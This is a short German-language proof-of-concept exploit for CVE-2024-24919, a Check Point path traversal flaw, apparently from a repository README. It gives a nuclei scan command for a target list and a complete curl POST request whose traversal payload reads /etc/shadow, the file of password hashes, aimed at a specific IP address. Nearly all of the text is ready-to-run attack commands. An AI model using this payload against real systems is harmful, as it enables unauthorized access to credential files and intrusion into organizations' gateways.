
Proof-of-Concept-Exploit für CVE-2024-24919, eine Check-Point-Pfadtraversierung, die das Lesen beliebiger Dateien (z. B. /etc/shadow) über eine manipulierte HTTPS-POST-Anfrage ermöglicht.

nuclei -list chick.txt -t CVE-2024-24919.yaml
Ersetzen Sie durch die Ziel-IP-Adresse. Dieser Befehl versucht, auf die Datei /etc/shadow zuzugreifen, die Passwort-Hashes enthält.
curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'
